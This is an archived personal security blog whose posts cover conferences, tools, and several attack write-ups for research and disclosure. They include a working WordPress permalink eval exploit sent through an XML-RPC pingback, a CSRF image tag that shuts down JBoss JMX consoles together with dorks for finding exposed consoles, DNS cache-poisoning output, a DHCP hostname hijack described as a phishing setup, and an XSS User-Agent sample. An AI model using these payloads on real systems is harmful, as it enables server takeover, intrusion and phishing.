Tyler Krpata

HacKidCon

2010-10-10T15:09:00.002-04:00

This weekend I attended HacKidCon with my 5-year-old. Overall, it was a very well put-together con, and we would definitely attend again.

The favorite was the "Maker" session with Larry Pesce from PaulDotCom, in which the kids did a basic electronics project consisting of an LED "firefly" in a jar, then built a pneumatic marshmallow cannon. (I'd say the marshmallow cannon was probably the biggest hit of the weekend.) The session was clearly well-planned, and the execution was flawless.

Other high points included magician Mike Bent, building and racing Lego Derby, and a Brazilian Jiu-Jitsu session with instructors from Mass BJJ.

There was plenty of food, and more importantly coffee, so that worked out very well.

One interesting note was that there were a couple of Lego Mindstorms sets just sitting out in an unused area, and they ended up being a huge hit. It seemed like a bit of an afterthought, but it actually provided a much-needed diversion for the kids AND the adults.

Suggestions for next time:

Two days is probably a little much for the younger kids. By day 2 we were both tired and cranky, and ended up leaving in the early afternoon.
There should probably be some more physically-oriented activities to let the kids blow off steam. They created their own by tearing around the main hallway throwing footballs at each other, which was probably not ideal. The BJJ session was good, but it would be nice if there was something running throughout the day.
More unstructured "village"-type activities. I think some of the sessions would have worked better that way, especially considering that the kids all had parents with them for help. For example, if we could have dropped in, sat at a computer, and worked on some of the programming language activities with a manual and an instructor available for questions, I think it would have worked better.
Related: I don't think one can expect kids to sit in front of a pile of computers, robots, electronics, etc. and expect them to wait while they pay attention to some slides.
45 minutes is about the longest a 5-year-old can sit and listen to a lecture, and even that is pushing it. I really don't think the standard conference talk format works well here, though I was surprised how interested the little one was in some of the topics related to online safety.

These aren't complaints, though. Overall, HacKid was very well-executed, and all the kids seemed to have a great time. I have to tip my hat to the organizers and sponsors for a job well done. See you next year!

Juniper SSL VPN - SSL cipher suites

2010-06-10T18:27:00.002-04:00

Juniper's SSL VPN continues to baffle me by doing inexplicably weird things. For example, you can tell it not to use weak ciphers, which is good. But it doesn't actually shut them off. It continues to let you negotiate an SSL session with weak ciphers, but then the SSL VPN itself gives you an error message: "This site requires Strong ciphers. Please upgrade your browser."

Ok, so maybe that's kind of user friendly, but I wouldn't be surprised if it was exploitable as well.

Like A Boss

2010-06-05T02:39:00.002-04:00

I will be talking about JBoss fail at DEFCON 18. Hope to see you there!

How to Manually Add a Movie Title to Boxee

2010-03-24T16:15:00.005-04:00

I've started using Boxee and it is really amazing. There's one small but very annoying issue I've come across. When Boxee indexes a movie or TV show, it attempts to go out and find the information about the file from IMDB. This usually works fine, but when it fails, there's no way to manually resolve it. This means that the media that fails to resolve does not appear in the appropriate menu. The ability to manually set this information is apparently coming, but in the meantime, here's how to do it manually.

You will need a way to edit SQLite database files, such as SQLite Database Browser.

The database file you want to edit is located at
UserData/Database/boxee_catalog.db.

Linux: ~/.boxee/UserData/
Mac OS/X: ~/Library/Application Support/BOXEE/UserData/
AppleTV: ~/Library/Application\ Support/BOXEE/UserData/
Windows Vista: C:\Users\\AppData\Roaming\BOXEE\userdata\
Windows XP: C:\Documents and Settings\\Application Data\BOXEE\userdata\

IMPORTANT: Back up the boxee_catalog file before editing!!

You will want to edit the video_files table.

Add a new row to the table. The idVideo value should automatically increment to the next available value, but you may want to verify this.

You do not have to fill in all the fields. These are the fields I used. I didn't really experiment to find out which ones were required.

Start up Boxee, and the new movie appears!

JBoss Attacks

2010-02-22T16:36:00.003-05:00

Read this first:
Hacking Unprotected JBOSS JMX Console Installations

An unprotected JMX console is a serious problem that doesn't get much attention. There are about a million Google dorks you can use to find one (or several). In addition to the ones in the linked post, I like:
inurl:"HtmlAdaptor" inurl:"maindeployer"
and
intitle:"tomcat status" inurl:8080

And of course you can find unprotected JMX consoles in any other number of ways. This will allow you to do things like shut down servers or deploy your own J2EE apps.

What I also noticed was interesting though, is that this functionality is completely CSRF-able. So even if YOU can't get to a particular site's JMX console, you may be able to CSRF someone else who can. Unfortunately there's no persistent authentication, so it might not be completely reliable; but it's a nice trick if you can make it work.

<img src="http://jbosshost:8080/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system%3Atype%3DServer&methodIndex=0" />

This Old Wordpress Worm

2010-02-01T15:55:00.003-05:00

In my quest for some ammo to support my anti-Wordpress rants here in the office, I thought it would be a good idea to try to reproduce the exploit that was going around in that infamous Wordpress worm last summer. Turned out to be a little more time-consuming than I thought it would be, but also pretty interesting.

I wanted to get this done in the laziest way possible, so I used all of the information available that would keep me from having to actually read or understand any code, or you know, do any hard work at all.

The official post on the matter provided a lot of the necessary information, going into detail about the high-level functionality.

"This particular worm, like many before it, is clever: it registers a user, uses a security bug (fixed earlier in the year) to allow evaluated code to be executed through the permalink structure, makes itself an admin, then uses JavaScript to hide itself when you look at users page, attempts to clean up after itself, then goes quiet so you never notice while it inserts hidden spam and malware into your old posts."

Since I don't care about the payload, all I need to know is:
1. It requires a registered user
2. It exploits a previously resolved security bug
3. The attack vector is through the permalink structure
4. It has something to do with eval'ed code

A couple of additional blog posts provided sufficient detail to get started, notably http://blog.nachotech.com/?p=125 which provided the HTTP logs of the attacker's activity.

The first action is a call to /wp-login.php. That's just going to be logging in the registered user.

The second action is a post to /wp-admin//options-permalink.php. That's the page that modifies the permalink structure. Notice the extra slash. That provides an authorization bypass allowing a normal user to modify the permalink structure. I didn't bother looking any further into the mechanics, and just took this one as a gimme.

We are provided the payload that goes into the permalink structure, something like: %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Since this makes no sense to me right at the moment, I'm going to go back to the WP Trac system and try to find some more information. This was after the fact of the worm in question, but nevertheless very helpful. http://core.trac.wordpress.org/ticket/10733

So we now know that we want to hit an eval() in either classes.php or rewrite.php.

Looking at the worm's third action, it looks like it posts to xmlrpc.php, so we'll try to see if we can get there from here.

Looking at rewrite.php first, the eval() in rewrite.php is called in the url_to_postid() function.

// Substitute the substring matches into the query.
eval("\$query = \"" . addslashes($query) . "\";");

Referencing back to xmlrpc.php, we can see that url_to_postid() is called from the pingback functions, which is just perfect!

if ($post_ID = url_to_postid($pagelinkedto)) {

The XML-RPC method is 'pingback.ping' and it takes the "linked from" URL and "post linked to" URL as parameters. Since the "post linked to" parameter is the one that url_to_postid() operates on, that's the only one we need to get right.

Now the only question is: how is the url_to_postid() function actually constructing the $query variable to be eval()'ed?

I'm not sure how to explain how the rewrite rules and associated filters get loaded, so I'll instead provide the following code and output:

include('./wp-load.php');
$rewrite = $wp_rewrite->wp_rewrite_rules();
var_dump($rewrite);

array(87) {
["robots\.txt$"]=>
string(18) "index.php?robots=1"
[".*wp-atom.php$"]=>
string(19) "index.php?feed=atom"
...
["([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/%evil%/trackback/?$"]=>
string(118) "index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&%evil%$matches[5]&tb=1"
...

Check out what happens. If the token we put into the permalink structure (%evil%) isn't understood, it's included verbatim in the query string. This is what's later going to be eval'ed.

So, back to url_to_postid(). When rewrite rules are enabled, it will loop through each rewrite rule trying to match against our query. If we get a match, we get to eval() the query string.

foreach ($rewrite as $match => $query) {
...
if ( preg_match("!^$match!", $request_match, $matches) ) {
$query = preg_replace("!^.+\?!", '', $query);
eval("\$query = \"" . addslashes($query) . "\";");

So what we want to do is match our request to one of the regex patterns whose resulting query contains the code we want to eval(). Reading that sentence makes my head hurt, but it's really pretty simple.

One thing that's interesting is that we're going to have a lot of the characters we'd want to use stripped out. The way the attacker did it was actually pretty cool:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

or, easier to read:

%&({${evil}}|.+)&%

First off, what's the mechanism through which evil() gets executed? The PHP docs are pretty weak on this point, but this was a handy little guide: http://cowburn.info/2008/01/12/php-vars-curly-braces/

Now, why the regex-y looking parens and extra chars? Turns out if we want to include a dollar sign to indicate a PHP variable, that will break the regex matching, being a special character meaning "end of line". What the extra characters allow us to do is to turn the match into an OR which will match anything between %& and &%.

Speaking of which, I still haven't figured out why we need the ampersands. Might just be a delimiter. I didn't use them.

As a proof-of-concept, I modified my permalink structure to look like:

/%year%/%monthnum%/%day%/%postname%/%({${phpinfo()}}|.+)%/

Then posted the following to xmlrpc.php


<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value>
 <string>http://source</string>
</value>
</param>
<param>
<value>
 <string>http://wordpresshost/wordpress/2010/01/29/hello-world/%({${phpinfo()}}|.+)%/trackback/</string>
</value>
</param>
</params>
</methodCall>

Which triggered the phpinfo() call. From there we can include any payload to execute arbitrary code.

I do want to call out the original attacker's payload as particularly clever (decode a base64-encoded referer header, and eval it.)

Don't Cry Wolf

2010-01-08T15:29:00.002-05:00

I often find myself in a position that's doesn't fit the security guy stereotype, the position of devil's advocate. In an organization that's heavily populated by engineering types, it's fairly common that a spike in traffic or an unexpected outage will be met with cries of "hackers! break-ins! denial of service!" and such. In these cases, I'm very deliberate in making sure that we have the facts before I pull the security incident alarm.

As a security team, we only have so much goodwill to spend on security incidents. The first time we report one, the organization will pull out all the stops to make sure we have the resources we need to address it. As time goes on, the enthusiasm fades. The sure way to make sure we NEVER get any help on an incident is to start reporting false positives. Think about it... we report a denial-of-service, then eventually realize it was actually a misconfigured system causing the bad traffic. If this happens a couple of times, eventually the organization will treat it exactly like we treat a car alarm going off in the parking lot: "ignore it, eventually it'll shut off on its own."

Obviously, if you see data being destroyed or going out the door, feel free to yell as loud as you can and pull out all the stops. But if you're just not sure, grab a couple of people you trust to help, and get the facts first. Spend your resources wisely. When the real thing hits, you'll be glad you did.

Thoughts on 2010

2010-01-01T14:38:00.002-05:00

Another decade come and gone. There are really just a few goals I have for myself in 2010, security-wise.

1. Ditch conventional wisdom

I find myself performing or recommending some "best practices" that, frankly, make me feel a little dirty. I intend to start looking at risk with a much more critical eye. (Just for example, I'm not sure I really believe XSS is as critical as the companies selling web app security products would tell you.)

2. Get actionable

This is more of a work thing. I've done a lot of work to increase the volume of security information available. My goal for this year is, in addition to building out more info-gathering capability, to really get to work on automating to the point where important information is correlated and alerted upon automatically. No more digging through irrelevant information looking for the real stuff.

3. Get back to basics

In the last couple of years, I've really gotten away from vulnerability research and exploit development, which is too bad because that's really what I am most interested in. I plan to devote some time to those activities this year.

Security Advisory Lingo Demystified F'Reals

2009-09-16T11:15:00.002-04:00

Inspired by Cisco Security Advisory Lingo Demystified.

Remote code execution: Can be used to pop up porn ads and send spam.

Mitigating factors: Bold-faced lies.

Workarounds: Hold onto your butts, we're not patching this anytime soon.

Not exploitable in the default configuration: Remote code execution.

Limited targeted attacks: You've been owned 6 times in the time it took you to read this.

Responsible disclosure: Researcher allowed the vendor to drag their feet for 18 months in order to ensure credit in the advisory.

Crafted packet: Who knows, Metasploit does all that nerd stuff.

Denial of service condition: Remote code execution.

Krpata's Law

2009-09-11T14:26:00.002-04:00

Godwin's Law: "As a Usenet discussion grows longer, the probability of a comparison involving Nazis or Hitler approaches 1."

Krpata's Law: As any online discussion grows longer, the probability of someone linking to XKCD approaches 1.

Interesting Firefox Alert

2009-09-04T17:44:00.003-04:00

Not sure I know what this means or whether it's useful yet, but if you try to make Firefox FTP to an SSH server (ftp://whatever:22) and hit Stop before it times out, it'll pop up an alert with the SSH version string.

Happens the same way whether you put it in the nav bar, img tag, script tag, or whatever. Wonder if there's any way to get at that programmatically.

DFU Mode

2009-09-02T22:06:00.001-04:00

If you're uncoordinated and easily confused like I am, here's a video on how to put your iPhone into DFU mode that even I was able to follow. Thank you, random college kid and wandering roommate.

Blackhat/DEFCON

2009-08-27T22:04:00.002-04:00

Ok, I'm apparently not going to get around to a full recap of Blackhat/DEFCON, so here's some bullet points.

Shawn Moyer/Nathan Hamiel talk was first and probably best at BH. I don't think most people got it. I'm not sure I even 100% got it.
Thanks to the DEFCON goons who got me into the BH speakers party. Maybe next year I will be there for real.
WhiteHat dinner was excellent! Good people over there.
Mandiant training was good. A little more "find malware in Windows boxes" than I'd have liked, but overall a very valuable experience.
HackProv! (Did you know that Chicago plays "Big Buddha" differently than Boston? They use swears.)
Badges by December. Seriously badge fail.
My favorite moment of the whole trip was making an analog iPhone amplifier out of a plastic cup and Seventeen magazine at the Riv bar at like 3am.
Also, some dude was like "I don't think you guys like the same music as me" but it turns out his iPod was loaded up with 90's industrial and we were all like "sup man"
Honestly by the time DEFCON rolled around I was pretty much talked out, I only ended up going to a very small number of talks. "The Psychology of Security Unusability" was excellent but much too rushed

Hallway/bar track was the best. Met a ton of cool people, and probably (maybe?) justified the money my company spent to send me out there. Definitely looking forward to next year, though I may skip the training.

XSS-ing the user agent. Is there a point?

2009-08-14T12:08:00.002-04:00

Still haven't gotten around to recapping the rest of BlackHat/DEFCON. It's still on the list. In the meantime...

I've been seeing a lot of this lately:
User-Agent: <script>window.location='http://somewhere'</script> (compatible; MSIE 7.0; ...etc etc)

I'm not sure if this is attacking a specific vulnerability, or just trolling for unknown XSS vulnerabilities. Doesn't seem like the most subtle way to do it in either case. Anyone know?

Post BlackHat/DEFCON

2009-08-04T18:28:00.003-04:00

Unfortunately the blogging failed closed after Blackhat Part 1, as the network got a little too dangerous to start throwing my Blogger credentials across it.

I have a ton to write about, and it's going to take me several posts. In the meantime, DEFCON BEES

Blackhat, Part 1

2009-07-26T23:26:00.002-04:00

My first two days of Blackhat are complete. This weekend I took the "Web Application (In)Security" course by NGS Software. The class was taught by Dafydd Stuttard and Marcus Pinto. It covered pretty much every web application security topic you can imagine, and was heavily focused on attack, rather than defense. It seemed very oriented toward pen testers.

Before the class started, I had some doubts about whether it would be too basic. While most of the topics covered were topics I was already familiar with, the course material as a whole was intermediate to advanced. Dafydd and Marcus really know their stuff, and it shows. We started going really quickly in day 2, and I think a lot of us were struggling to keep up.

The course was about evenly split between presentation time and lab time. I appreciated the hands-on approach. These guys had a TON of labs available. I actually was kind of annoyed at the absolute impossibility of completing all the labs in the time given, but I think the point was to make sure nobody ran out of work to do. I don't think anyone was expected to complete them all.

We were encouraged to use Burp Suite, and many of the examples were shown using Burp. I'd never used Burp before, thinking it was just another localhost proxy. Turns out I was very wrong. Burp is an extremely powerful, flexible, and complete web application security tool, and I will definitely be using it in the future. I'd say this aspect of the course was worth the price of admission.

We finished out the course with a CTF game, which always makes me happy. I wish we had a little more time to work on it. (And I'm happy to say that I spent most of the game near the top of the leaderboard.)

My only real complaint about the course is that there seemed to be way too much material for two days, and it felt very rushed. (Also, the room was absolutely FREEZING.)

In other Vegas news, I kind of feel like I should be putting some more effort into making some friends here. I haven't really been socializing outside of class. I've spent some time on the poker tables, but I've been taking a beating and am busted out. (Last night I went to the felt on a flush draw with two overs, caught my flush on the river, turns out I was drawing dead to a boat. Part bad luck, part bad play.)

Also, there is absolutely nowhere to eat here that costs less than a million dollars.

Tyler Krpata: Picks for BlackHat 2009

2009-07-10T14:38:00.002-04:00

As prompted by Jeremiah Grossman: Picks for BlackHat 2009

Day 1

FX: Router Exploitation
Nathan Hamiel & Shawn Moyer: Weaponizing the Web
Eduardo Vela Nava & David Lindsay: Our Favorite XSS Filters and How to Attack Them
Dan Kaminsky: Something to do with Network Security? (LOLZ)
Thomas Ptacek, David Goldsmith & Jeremy Rauch: Hacking Capitalism '09

Day 2
Not that interested in any of the 10am talks, so either

Zane Lackey & Luis Miras: Attacking SMS

Tyler Krpata: Sleep Late :)
Jeremiah Grossman & Trey Ford: Mo' Money Mo' Problems (and I don't even have to be there!)
Kevin Mahaffey, Anthony Lineberry & John Hering: Is Your Phone Pwned?
Turbo track

Steve Ocepek: Long-Term Sessions - This Is Why We Can't Have Nice Things
Peter Guerra: How Economics and Information Security Affects Cyber Crime
Michael Brooks: BitTorrent hacks

Bruce Schneier: Reconceptualizing Security

Email From Security

2009-07-09T17:36:00.002-04:00

From: Security
To: User
Subject: Cut the shit

Dear

This email is in regards to your recent download of "Ja Rule - R.U.L.E."

First of all, who the fuck listens to Ja Rule. I mean really.

Let's be clear, I could give a fuck less if you want to pirate music. Hell, I'm in FAVOR of illegal downloads. Nothing like Robin-Hood'ing those motherfuckers. When I have to think really hard before buying a DVD or a six pack, while the latest MTV flash-in-the-pan has 18 diamonds glued to his teeth, I think we can agree the recording industry is corrupt as hell and deserves what they get.

But regardless, for better or for worse, I'm the one stuck wasting my time responding to DMCA complaints when your stupid ass decides to use your employer's internet connection to download this shit. I know you don't realize it, but every time you do something stupid, a little alert pops up on my desktop, and then I have to do something about it. Believe it or not, I have better things to do with my time. Those Facebook status updates don't write themselves, you know.

In short: smarten up, or I'm changing your desktop background to lemonparty and disabling all your accounts.

Love,
Security

Random iPhone thought...

2009-06-29T15:03:00.002-04:00

I just had a wild thought. If someone's got the audible clicks going on their iPhone, could you sniff their typing based on the relative time between keystrokes?

Decode F5 BigIP cookie in one line of Perl

2009-06-11T15:29:00.002-04:00

BigIPcookie = 673059850.20480.0000

echo 673059850.20480.0000 | perl -ne'print join ".", map {hex} reverse ((sprintf "%08x", split /\./, $_) =~ /../g);'

10.20.30.40

My Take on Enterprise Vulnerability Assessment

2009-05-27T16:28:00.001-04:00

I wrote this in an email today, thought I would clean it up and re-post here. It's in response to the question "why not use an open source vulnerability scanner?" I realize it reads a bit like an ad for QualysGuard. I really like QualysGuard though. (Err, also no offense to Tenable. I like you guys just fine, you know, as people.)

The only free product in this space that’s considered “enterprise class” is Nessus. (As of Nessus 3, the license is no longer “open source”. Free as in beer.) The problem is there’s no central management. In fact, Tenable sells a commercial management system for enterprise Nessus use for that very reason. I’ve looked into Nessus/SecurityCenter in the past, and found the interface to be barely usable and the false positive rate through the roof… basically it was nearly impossible to get actionable information out of it.

My opinion is that we want to go with a solution that allows us not only to check the compliance checkbox, but to actually improve our overall security posture. Any vulnerability management program really comes down to the processes in place to prioritize and remediate identified issues, but for that to work, the process needs to be fed good, actionable information. Qualys is the best solution to provide that.

From an operator’s standpoint, Qualys is the easiest solution to manage. This is important once you are scanning more than a small network, because unless you’re able to organize, it’s really difficult to accurately classify assets and report on vulnerabilities. Again, it’s a matter of getting the right information, and then getting it to the right people.

I’m a big fan of open source/free software when appropriate, but I’ve found that for most security applications, open source lags pretty far behind. The big name open source security products generally have a commercial enterprise component for management of larger installations (Tripwire, Snort), and for good reason. Once you’re beyond a very small target network, the volume of information is such that it’s really impossible to get any useful information out if there’s no central management, reporting, etc.

Conficker: Fact or Fiction

2009-03-23T16:14:00.002-04:00

The web-o-sphere is abuzz with news that Conficker.C (a.k.a. Downadup.C) is preparing to implement its new update scheme on April 1, or as one article so sensationally put it, "No Joke - Conficker Worm set to explode on April Fool's Day!" All the trolls are out, and it's clear that there's a generally poor understanding of the issue out there. This post is an attempt on my part to correct some of the myths, to the best of my ability. Comments are appreciated.

Fiction: This is easy to fix! Take down the command and control machine and/or infiltrate the botnet and upload self-destruct code and/or create a white hat worm to repair infections!

1. There IS no C&C. Updates are propagated through a (newly) robust P2P mechanism. It does rely upon communicating with a predetermined domain name generated by date. Until revision C, this was a list of 250 domains per day, which were eventually prevented from being used by the good guys. Unfortunately, the newest update expands the space to 50,000 domain names per day, which is effectively logistically impossible to control.
2. Infected hosts will not execute arbitrary code. All updates are digitally signed with a key known only to the authors.
3. That's worked real well before. The idea is generally agreed to be ethically ambiguous, of dubious effectiveness, and most definitely illegal.

Fiction: April 1 we are all doomed!

Fact: Shades of Michelangelo! The fact is that the Conficker botnet does have the potential to cause some pretty severe damage on April 1. The more likely scenario, though, is that if it does anything at all on that date, it'll be another update that provides it with additional functionality. The end is (probably) not near. In the long run, this system is more likely to be used for blackhat money-making activites rather than some Internet-ending attack. I don't mean to minimize the damage potential, but I don't think it's time to panic and unplug everything from the network on April 1.

Fiction: Buy a Mac (Linux, BSD, Commodore 64, etc.)

Fact: It seems like the smug, self-satisfied Mac and Linux users can't hit the keys fast enough on this one. Ok, so the fact is that this particular malware does not target any non-Windows OS. This in no way proves the numerous comments that Mac and Linux systems are virus-immune. Market share is the key here. There's no real gain to be had by a malware author who infects some small percentage of what's already a small percentage of installed user base. If there's one thing NOT to take out of this, it's that "Macs are more secure."

Fiction: This seems bad. I am worried about my own computer.

Fact: If you're aware that Conficker exists, you're probably adequately protected. It would be a rare case where a regularly-updated system with working antivirus would be a victim of this malware. The systems being compromised are probably not yours. Sure, definitely check for it. But you should be worrying a lot more about the threat FROM other people's computers.

To close out, the fact is that whoever is behind this monster has proven to be very technically competent and pretty well on top of their game. Fact is, nobody really knows what they are up to. I don't think there's any cause for panic, but the Conficker botnet is essentially an incredibly powerful illegal supercomputer, and very well could be used to cause some serious damage. It's important to be diligent while keeping perspective.

In a nutshell...

2009-03-20T17:50:00.002-04:00

Never trust a cookie

2008-12-11T21:30:00.000-05:00

Let's say you're testing a web app, and you notice that in addition to a standard JSESSIONID, it sets 3 additional cookies:
XXSessionID
XXSessionUser
XXSessionEmpno

If you're like me, you get a little excited when you notice that the last two contain the username and employee number of the logged in user. Any time an application is storing identifiable information in a cookie, there's a good chance it's a disaster waiting to happen. The fact is that if it's being stored there, it's being used somewhere, and chances are it's not being revalidated before being used.

So, like a good little security gnome, I change the username and ID number to "not mine", and sure enough, I am now somebody else. Authorization problems like this are unfortunately incredibly common. Many apps are very strict about making sure you authenticate, but once you've done so, forget to check that you are authorized to the resources you access.

But wait! Do I even need to authenticate in the first place to exploit this? Let's see... *type type type* No luck. As it should be, the app is checking the session ID to make sure I'm at least logged in as SOMEBODY. I guess that's good.

Oh, wait...turns out it just checks for the existence of the session ID cookie. As long as I put any bogus value in the XXSessionID cookie, I can specify any user's username and employee ID in the XXSessionUser and XXSessionEmpno cookies without having to log in.

Lessons learned:
1. Use your built-in session management tools.
2. Store session state information server-side.
3. Never trust a cookie.

Vote.

2008-11-03T09:11:00.000-05:00

From Mitch:

In the movie WarGames, the computer realizes that the only way to win a nuclear war is not to play. Voting is the opposite: the only way to lose is not to play. So please go out there tomorrow and cast your ballot for whatever candidate you think is the best choice, based on their stated policies. Every election is important, and this one is no different. Nothing else you do all year will matter as much.

Instinctive threat modeling

2008-10-29T14:31:00.004-04:00

A friend of mine sent me a link to a new site today, and, as tends to happen, my mind immediately turned to "how could this be broken?"

In this particular case, what interested me was a field that allowed an unauthenticated user to add an arbitrary subdomain to the site, as in <user input>.thedomain.com.

Depending on how the process occurs, something as simple and common as CRLF injection could potentially be a serious hole here.

It occurs to me that this ability to instinctively identify where the potential biggest holes are, before even beginning testing, is a fairly important skill for a security professional. I firmly believe that having a well-rounded technology background is the key to this. In the case of this particular site, I had to tap into experience with:
1. Web development
2. DNS protocol and software
3. Common web site security flaws

There are certain flaws that a security person with the right background can identify just by understanding the thought processes of a developer or a sysadmin, along with a solid grasp on "how it works". One great example is the DNS flaw discovered by Dan Kaminsky earlier this summer. Ultimately an incredibly simple flaw that, once revealed, seemed painstakingly obvious to anyone with an understanding of how DNS works. But it took someone like Dan with a very deep, practical knowledge of DNS along with an advanced security mindset to put all the pieces together.

WMI/DCOM from Linux

2008-10-06T16:32:00.003-04:00

Don't know why this was so tough to Google for, but the solution for WMI queries to a Windows box from Linux is right here.

From the README:

DCOM/WMI client implementation for Linux.
    andrzej.hajda@wp.pl, 2006-2007

ABOUT

This implementation of DCOM/WMI client is based on Samba4 sources.
It uses RPC/DCOM mechanism to interact with WMI services on
Windows 2000/XP/2003 machines.
It contains also winexe - program to remote execution Windows commands remotely from Linux box.
Additional info about winexe at http://eol.ovh.org/winexe/.

  bin/wmic - WMI simple client, it queries server using ExecQuery WMI method,
         sample usage:
            wmic -U domain/user%password //host "select Name from Win32_Process"
         Program is at early stage of development and there are many bugs.
         To retrieve more debug info use switch "-d number", where bigger number
         corresponds to bigger output (I am using "-d 99" :) )
  bin/wmis - WMI test suite. Currently it does only following things:
        - Creates directory remotely using Win32_Process.Create("cmd.exe /C mkdir C:\wmi_test_dir_tmp").
        - Executes ExecNotificationQuery for monitoring file create/delete events in this directory.
        - Waits for 4 notifications and display their types.
  wmi/_pywmi.so - Samba wrapper for python, together with wmi/pywmi.py and ../pycom/* modules can be used
        to run zenwin on Linux.
  bin/winexe - Remote windows commands execution.
        Sample usage:
            winexe -U domain/user%password //192.168.0.3 "ipconfig /all"

WMIC, which is really what I was looking for, works great. There are also Python modules, which I haven't tried yet.

2008-08-28T10:16:00.001-04:00

Mitch Krpata writes a fantastic video game blog called Insult Swordfighting, and is a total whore for Technorati authority. So here you go! The name alone makes you want to visit!

He also writes for The Phoenix.

Jeepers.

2008-07-23T17:53:00.000-04:00

msf auxiliary(baliwicked_host) > exploit
[*] Targeting nameserver x.x.x.x for injection of pwned.XXX.com. as 1.3.3.7
[*] Querying recon nameserver for XXX.com.'s nameservers...
[*] Got an NS record: XXX.com. 258801 IN NS ns1.XXX.com.
[*] Querying recon nameserver for address of ns1.XXX.com....
[*] Got an A record: ns1.XXX.com. 258801 IN A x.x.x.x
[*] Checking Authoritativeness: Querying x.x.x.x for XXX.com....
[*] ns1.XXX.com. is authoritative for XXX.com., adding to list of nameservers to spoof as
[*] Attempting to inject a poison record for pwned.XXX.com. into x.x.x.x:34649...
[*] Sent 1000 queries and 10000 spoofed responses...
[*] Sent 2000 queries and 20000 spoofed responses...
[*] Poisoning successful after 2250 attempts: pwned.XXX.com == 1.3.3.7
[*] Auxiliary module execution completed

$ nslookup.exe pwned.XXX.com pwned.nameserver.com
Server: pwned.nameserver.com
Address: x.x.x.x

Non-authoritative answer:
Name: pwned.XXX.com
Address: 1.3.3.7

Weighing in on the DNS thing...

2008-07-16T23:50:00.002-04:00

My quick thoughts on the Kaminsky DNS thing, though I'm a little late to the party. Apparently it's a real thing. I spoke with someone who's lucky enough to be in the Magical Inner Circle of Truth and he agreed.

I have nothing but wild speculation here. I read through the BIND source a little, and I may be barking up the wrong tree, but it looks like the resolver doesn't randomize the QID for every query. Rather, it keeps a QID pool and checks for collisions before assigning an ID. Therefore, if you were to send a large number of queries to a bogus server where they will time out, you could effectively take those QIDs out of play. If this is a server you control, you are then able to drastically reduce the search space, since you know which QIDs you don't have to try.

Just a thought.

Drawball code

2008-06-20T10:13:00.003-04:00

Looks like a lot of people are showing up here looking for the Drawball information I posted last year. Here's some crummy Perl code that might help you get started. All it does is connect to the server every second and check how much ink you've got, as an integer value.


#!/usr/bin/perl

use IO::Socket::Inet;
use LWP::Simple;
use strict;

$/ = "\x00";
my $sock = IO::Socket::INET->new('70.84.35.114:8007') or die "Could not connect\n";
handshake();

while($sock) {
    if(my $ink = getink()) {
        printf "ink: %08x\n", $ink;
    }
    sleep 1;
}

sub getink {
    print $sock "i\x00";
    my $i = <$sock>;
    my $numink = undef;
    if($i =~ /^i(\x01.{3})\x00/) {
        $numink = unpack "N", $1;
    } 
    return $numink;
}

sub handshake {
    my ($seed) = (get "http://www.drawball.com") =~ /l=(.{7})/;
    print $sock "$seed\x00";
    my $chal = <$sock>; 
    my $resp = decode($seed, $chal);
    print $sock "$resp\x00";
    print $sock "\x65\x00\x69\x00\x62\x01\x01\x01\x01\x07\x00";
}

sub decode {
    my @k1 = split //, shift;
    my @k2 = split //, shift;

    my $out;
    my $k2c = 0;
    for(0 .. @k1-1) {
        my $tmp = ord($k2[$k2c]) - 65;
        my $c = ord($k1[$_]) - $tmp;
        my $out .= chr($c);
        my $k2c += 2;
    }
    return $out;
}

2008-06-02T16:14:00.001-04:00

OK, now that's funny.

2008-05-28T10:53:00.002-04:00

Neat: code execution vulnerability on the Motorola Razr.

By the way, I predict this sort of thing is going to get huge and nasty REALLY quickly in the next couple of years, especially as phones evolve to become more iPhone-like (standard Wifi, for example). Anyone want to start a pool on when the first widespread wild mobile worm will hit?

Of course!

2008-04-18T12:49:00.000-04:00

"Bad programming? Use good programming. It’s so simple! How could we not have seen it!" -Ptacek

Read this post.

Evil Friday

2008-04-11T16:27:00.002-04:00

(YMMV.)

Take one DHCP server that allows you to set your hostname in DNS. Add a whole mess of workstations which are configured with the same search suffix as the DNS domainname. Then call yourself google. Set up a web server and catch all the people who are just typing "google" into their browsers. (I used a Python script to log the request, then 302 the user to google.com.)

host1.domain.edu - - [11/Apr/2008 14:38:27] "GET / HTTP/1.1" 302 -
host2.domain.edu - - [11/Apr/2008 14:46:38] "GET / HTTP/1.1" 302 -
host3.domain.edu - - [11/Apr/2008 14:49:34] "GET / HTTP/1.1" 302 -
host4.domain.edu - - [11/Apr/2008 14:55:21] "GET / HTTP/1.1" 302 -
host5.domain.edu - - [11/Apr/2008 15:03:45] "GET / HTTP/1.1" 302 -
host6.domain.edu - - [11/Apr/2008 15:07:58] "GET / HTTP/1.1" 302 -
host7.domain.edu - - [11/Apr/2008 15:09:45] "GET / HTTP/1.1" 302 -
host8.domain.edu - - [11/Apr/2008 15:10:17] "GET / HTTP/1.1" 302 -
host9.domain.edu - - [11/Apr/2008 15:17:01] "GET / HTTP/1.1" 302 -
host10.domain.edu - - [11/Apr/2008 15:17:37] "GET / HTTP/1.1" 302 -

Optional: go phishing.
Optional part II: clobber the DNS entry for a legitimate host on the network and have REAL fun. (Yes, this works, at least in my environment.)

Bash Brace Expansion

2008-04-08T07:12:00.002-04:00

I have to give a little shout out to Bash brace expansion. This is one of the neat little toys that I rarely see mentioned. The really quick summary reads like this:

$ echo test_{foo,bar,baz}
test_foo test_bar test_baz

which is useful enough, but where it really shines is in sequence expansion. The idiomatic Bash For loop I've often seen is something like:

$ for i in `seq 1 10`; do echo $i; done

which is just nasty. Compare to:

$ for i in {1..10}; do echo $i; done

which is nicer, but even more nice is:

$ echo {1..10} | tr ' ' '\n'

(IMHO.)

And of course, something like this this comes in really handy:

$ wget www.somewhere.com/{a,b}{1..9}.jpg

Not sure what I would use that for... ;)

Wow, TFTP servers really do suck.

2008-03-29T16:57:00.006-04:00

